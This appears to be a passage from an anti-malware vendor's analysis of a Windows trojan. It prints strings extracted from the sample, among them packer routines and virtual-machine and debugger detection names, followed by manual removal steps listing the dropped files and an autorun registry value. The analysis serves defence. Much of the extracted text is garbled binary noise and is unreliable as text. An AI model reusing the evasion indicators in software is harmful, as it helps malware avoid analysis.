WIN_VER_WINDOWSSEVEN_ENTERPRISE_SERVER_CORE_V
Windows 7 Enterprise Server IA64
WIN_VER_WINDOWSSEVEN_ENTERPRISE_SERVER_IA64
Windows 7 Home Basic
WIN_VER_WINDOWSSEVEN_HOME_BASIC
Windows 7 Home Premium
WIN_VER_WINDOWSSEVEN_HOME_PREMIUM
Windows 7 Home Server
WIN_VER_WINDOWSSEVEN_HOME_SERVER
Windows 7 Server For Small Business
WIN_VER_WINDOWSSEVEN_SERVER_FOR_SMALLBUSINESS
Windows 7 Small Business Server
WIN_VER_WINDOWSSEVEN_SMALLBUSINESS_SERVER
Windows 7 Small Business Server Premium
WIN_VER_WINDOWSSEVEN_SMALLBUSINESS_SERVER_PREMIUM
Windows 7 Medium Business Server Management
WIN_VER_WINDOWSSEVEN_MEDIUMBUSINESS_SERVER_MANAGEMENT
Windows 7 Medium Business Server Messaging
WIN_VER_WINDOWSSEVEN_MEDIUMBUSINESS_SERVER_MESSAGING
Windows 7 Medium Business Server Security
WIN_VER_WINDOWSSEVEN_MEDIUMBUSINESS_SERVER_SECURITY
Windows 7 Standard Server
WIN_VER_WINDOWSSEVEN_STANDARD_SERVER
Windows 7 Standard Server V
WIN_VER_WINDOWSSEVEN_STANDARD_SERVER_V
Windows 7 Standard Server Core
WIN_VER_WINDOWSSEVEN_STANDARD_SERVER_CORE
Windows 7 Standard Server Core V
WIN_VER_WINDOWSSEVEN_STANDARD_SERVER_CORE_V
Windows 7 Starter
WIN_VER_WINDOWSSEVEN_STARTER
Windows 7 Storage Enterprise Server
WIN_VER_WINDOWSSEVEN_STORAGE_ENTERPRISE_SERVER
Windows 7 Storage Express Server
WIN_VER_WINDOWSSEVEN_STORAGE_EXPRESS_SERVER
Windows 7 Storage Standard Server
WIN_VER_WINDOWSSEVEN_STORAGE_STANDARD_SERVER
Windows 7 Storage Workgroup Server
WIN_VER_WINDOWSSEVEN_STORAGE_WORKGROUP_SERVER
Windows 7 Undefined
WIN_VER_WINDOWSSEVEN_UNDEFINED
Windows 7 Ultimate
WIN_VER_WINDOWSSEVEN_ULTIMATE
Windows 7 Web Server
WIN_VER_WINDOWSSEVEN_WEB_SERVER
Windows 7 Web Server Core
WIN_VER_WINDOWSSEVEN_WEB_SERVER_CORE
Windows 7 Unlicensed
WIN_VER_WINDOWSSEVEN_UNLICENSED
Portuguese (Brazil)
Portuguese (Portugal)
Enigma_Plugin_OnSaveKey
Enigma_Plugin_OnLoadKey
ntdll.dll
LS_Enigma_Plugin_OnDeleteKey
ole32.dll
comctl32.dll
!"#$%&*;<=>@[]^_`{|}
TNT Internal Error: TWideComponentHelper.Create should never be encountered.
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntClasses.pas
Library not found: %s
Function not found: %s.%s
RtlFormatCurrentUserKeyPath
TExported0
USER32.DLL
EInvalidGraphicOperation
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
Uhe%f
MAPI32.DLL
TComboBoxExEnumerator
ssHorizontal
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
HelpKeyword
OnExecute
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreviewx
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
AutoHotkeys
TKeyEvent
TKeyPressEvent
crSQLWait
%s (%s)
imm32.dll
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntActnList.pas
PasswordChard
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntStdCtrls.pas
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntForms.pas
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntMenus.pas
Internal Error: SyncHotKeyPosition Failed ("%s" <> "%s").
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntControls.pas
Internal Error: SubClassUnicodeControl.Control is not Unicode.
.UnicodeClass
TntUnicodeVcl.DestroyWindow
Internal Error: Control does not support ITntGlyphButton.
dtPostMsg
Software\Microsoft\Windows\CurrentVersion
ProductKey
Software\Microsoft\Windows NT\CurrentVersion
\\.\PhysicalDrive0
\\.\%s
\\.\Scsi0:
\\.\SMARTVSD
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntRegistry.pas
#$%&'()* ,-./01234
PSAPI.dll
VBoxService.exe
ÞFAULT FOLDER%
%SYSTEM FOLDER%
%WINDOWS FOLDER%
Mutex object: Unique: %d-%d. Number: %d
THookWindowsAPI
EP_RegCheckKey
EP_RegCheckKeyA
EP_RegCheckKeyW
EP_RegSaveKey
EP_RegSaveKeyA
EP_RegSaveKeyW
EP_RegLoadKey
EP_RegLoadKeyA
EP_RegLoadKeyW
EP_RegLoadAndCheckKey
EP_RegCheckAndSaveKey
EP_RegCheckAndSaveKeyA
EP_RegCheckAndSaveKeyW
EP_RegDeleteKey
EP_RegKeyExpirationDate
EP_RegKeyExpirationDateEx
EP_RegKeyCreationDate
EP_RegKeyCreationDateEx
EP_RegKeyExecutions
EP_RegKeyExecutionsTotal
EP_RegKeyExecutionsLeft
EP_RegKeyDays
EP_RegKeyDaysTotal
EP_RegKeyDaysLeft
EP_RegKeyRuntime
EP_RegKeyRuntimeTotal
EP_RegKeyRuntimeLeft
EP_RegKeyGlobalTime
EP_RegKeyGlobalTimeTotal
EP_RegKeyGlobalTimeLeft
EP_RegKeyRegisterAfterDate
EP_RegKeyRegisterAfterDateEx
EP_RegKeyRegisterBeforeDate
EP_RegKeyRegisterBeforeDateEx
EP_TrialExecutions
EP_TrialExecutionsTotal
EP_TrialExecutionsLeft
EP_TrialExecutionTime
EP_TrialExecutionTimeTotal
EP_TrialExecutionTimeLeft
EP_RegCheckKeyEx
EP_RegSaveKeyEx
EP_RegLoadKeyEx
EP_CheckUpStartupPasswordHashString
EP_ProtectedStringByKey
EP_RegKeyInformation
EP_RegKeyInformationA
EP_RegKeyInformationW
EP_RegKeyStatus
DLL_Loader_Import_Unit
TInitImport
Could not load library: %s
Function %s not found in module %s
File not found: %s
Can't find DLL entry point %s in %s
"%s" %s
%s %s
mscorwks.dll
mscoreei.dll
%Xv_F5
<-7}G
.uJ>X
3%S;C
coRegistratioKey
ZwOpenKey
ZwEnumerateValueKey
ZwQueryKey
ZwQueryValueKey
ZwCreateKey
ZwEnumerateKey
ZwSetValueKey
ZwDeleteKey
ZwDeleteValueKey
ZwFlushKey
ZwLoadKey
ZwLoadKey2
ZwNotifyChangeKey
ZwQueryMultipleValueKey
ZwReplaceKey
ZwRestoreKey
ZwSaveKey
ZwSetInformationKey
ZwUnloadKey
ZwOpenKeyEx
ZwQuerySection, Unsupported class %d
KeySetValue unsupported value type
ZwQueryValueKey, unsupported class %d
ZwQueryKey, unsupported class %d
ZwQueryObject with unsupported class
ZwReadFileInformation with unsupported class
ZwSetInformationFile with unsupported class
sxs.dll
THookWindowsAPI
%XT#B%
\\.\NTICE
\\.\SICE
\\.\SIWDEBUG
%s\%.8x%.8x-%.8x%.8x
)TEnigmaProtectorLoaderFormStartuppassword
)TEnigmaProtectorLoaderFormStartuppassword(*n
DLL_Loader_RunPassword_Unit
decrypt_on_execute_begin
ECRONEXECB
decrypt_on_execute_end
ECRONEXECE
.section
DLL_Loader.dll
@``@``@``@``@``@``@``@
@``@``@``@``@``
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
_enigma_keygen_routines
TntWindows
UrlMon
virtualboximportunit
KeyRoutines
nJwaWindows
 DLL_Loader_Import_Unit
.lpMs"p
P..sK
g{.hi
4%u^t
\ps|%f.
`X%czf
\ .tO
7[.SA
m%chd
$.BLy
.ESq`
-iftP8
>p.jWPm
q%U~Kk/
HuRl
"G.oR
mH%Ct
C*.LZ
user32.dll
advapi32.dll
version.dll
gdi32.dll
shell32.dll
SHFolder.dll
shlwapi.dll
GetWindowsDirectoryW
GetWindowsDirectoryA
GetCPInfo
GetKeyboardType
VkKeyScanW
UnhookWindowsHookEx
SetWindowsHookExW
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyW
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextW
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
RegOpenKeyExA
RegCloseKey
RegOpenKeyA
RegFlushKey
RegCreateKeyExA
SetViewportOrgEx
ShellExecuteW
ShellExecuteA
5!5%5)5-51555
? ?$?(?,?0?4?8?
9!9%9)9-919
6#6'6 6/6
5 5$5(5,50545
;#;'; ;/;3;7;
9 9$9(9,90949
8$9(9,909
7 7$7(7,7
7 7$7(767>7
<$<9<=<_<
9!9%9)9-9195999
9#9 9<9\9
: :(:,:0:4:|:
rasapi32.dll
winmm.dll
winspool.drv
oledlg.dll
ws2_32.dll
wininet.dll
comdlg32.dll
.Rt&#
%Cookies FOLDER%
Unspecified error (%d) from %s.
debug.log
enigma_ide.dll
ÚysToKeyExp%
%RegKey%
%KeyExpYear%
%KeyExpMonth%
%KeyExpDay%
%CU_EXTFILES%
%CU_EXECPR%
%CU_INSTSERV%
%CU_WINVER%
%CU_VIRTTOOLS%
%TrialExecsTotal%
%TrialExecsLeft%
%TrialExecMinsTotal%
%TrialExecMinsLeft%
hh.exe
write.exe
attrib.exe
chkdsk.exe
compact.exe
find.exe
help.exe
winver.exe
regsvr32.exe
replace.exe
dllhost.exe
ntvdm.exe
tcpsvcs.exe
Was not able to create virtual value at ImportCall_ZwSetValueKey
Was not able to create virtual key at ImportCall_ZwSetValueKey
ImportCall_ZwLoadKey
ImportCall_ZwLoadKey2
ImportCall_ZwNotifyChangeKey
ImportCall_ZwQueryMultipleValueKey
ImportCall_ZwReplaceKey
ImportCall_ZwRestoreKey
ImportCall_ZwSaveKey
ImportCall_ZwSetInformationKey
ImportCall_ZwUnloadKey
evb*.tmp
.manifest
Unsupported call of ZwSetVolumeInformationFile
\device\harddiskvolume1\test6\wait.htm
Application requires password to start
Enter password
Change password
New password:
Confirm new password:
% )*0./(&'312-,
RichEdit line insertion error=This control requires version 4.70 or greater of COMCTL32.DLL
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Alt  Clipboard does not support Icons
Text exceeds memo capacity/Menu '%s' is already being used by another form
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Thread creation error: %s
Thread Error: %s (%d)7CreateClone not implemented for class %s with source %s
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Unsupported clipboard format
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
'%s' is an invalid mask at (%d)$''%s'' is not a valid component name
Ancestor for '%s' not found
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

%original file name%.exe_912_rwx_008B7000_0010C000:

P.reloc
l]!.QQ
HtlGs}%u
_nX%SX
Keyw~
>h.MR
%s_4d
W:\3rdpa
.TSC{
hI%F"
Prkey
.Rdj;)
P{rþ_)
F.hqO
*;<=>@[]
3UDPT
xport
.SGlf,I
vZED-S}
6<Tj%S[u
%u<x$P&
(s^%f
8@ý
Q?%uf
<.CX$
%Dhk\L
%X0`W
&%F!"
YÀ_6T%s4_
o%FQ3
].t%CTQ
8"h%s
.Vj!'
!.dh:J)
%SA <<
MAIN%C
w%Ud!
 x.LG
%ul;T'
.LLI^
@keys
34567890
]U.av
?,?3:4;8'9
YS~.DZ
%s2 (
uj\%s
%uFW%
%c)]!
Ê[n
-%F W
CrTSh
dp("%s
.ei$uK
TbG.ly
JYGN%u
.hf~z j
* ,-./01
.wQxqe2
ÞFAU
KW.HK
k.TBh -q
-uuEn},
.uJ>X
E.HTD
s%upC(
(%fjb
0TCPG
.xOuN
&t .zw
.Dp#}
23456789
8$4,6-9'
G"%D.
\.Gr8
(!q%SP
"%D 1
%SEo\
n0l32.ud
%Fsp!
%UA)(
_A.tr*
By%cJ
u%F!-
D-g%s
1%CwF
Z2-Y}
8%S(J
-$.Sh
F&
.lD`F$<aG
rDT%Ur
bJSXK
TZ .HF
SrRf%u
4%u^t
X%czf
ÛS@yR6
o.PU#
%6sV(x
9Oh~Î
#_?@7/6-
DZ\%u
7V.Xx
p.jWPm
q%U~Kk/
HuRl
dc|ô
.Kj2H
J4.dQ
y.nC@
:#;'< =/>
T>.TZr`
.RK^'G
t?L.PZ^~x~|]
'NX.Nk
3MlL%U
%Cp<t
q6%f.Z
(.zZ%
?-?1%5}$
Site : hXXp://VVV.enigmaprotector.com/
E-mail : [email protected]
Lisence holder: %s

%original file name%.exe_912_rwx_00F20000_00004000:

Invalid NULL variant operation
Invalid variant operation
Variant method calls not supported
Access violation at address %p. %s of address %p
Invalid pointer operation
Invalid floating point operation
I/O error %d
'%s' is not a valid integer value

%original file name%.exe_912_rwx_01020000_00044000:

/* Dr Brian Gladman ([email protected]) 14th January 1999 */
1.4.0.0
c:\%original file name%.exe
|ntdll.dll
87e200571217a14b37266e.exe
|kernel32.dll
200571217a14b37266e.exe
A~user32.dll
wgdi32.dll
wadvapi32.dll
wrpcrt4.dll
wsecur32.dll
woleaut32.dll
wmsvcrt.dll
Nwole32.dll
|shell32.dll
wshlwapi.dll
wversion.dll
vrasapi32.dll
vrasman.dll
[netapi32.dll
qws2_32.dll
qws2help.dll
vtapi32.dll
vrtutils.dll
vwinmm.dll
swinspool.drv
]comctl32.dll
}oledlg.dll
wwininet.dll
wcrypt32.dll
wmsasn1.dll
;vcomdlg32.dll
9vimm32.dll
blpk.dll
tusp10.dll
=wcomctl32.dll
xvshfolder.dll
ntdll.dll
LINKINFO.dll
1.4\license.dat
application.exe

%original file name%.exe_912_rwx_01068000_00018000:

%SHvWWj


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\gengxin[1].htm (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\core[1].php (751 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\config[1].htm (25 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (165 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\stat[1].php (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\gengxin[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (205 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (4144 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\online_v3[1].htm (821 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (254 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (170 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\stat[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Desktop\ÍøÖ·µ¼º½.lnk (729 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "smss" = "c:\smss.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now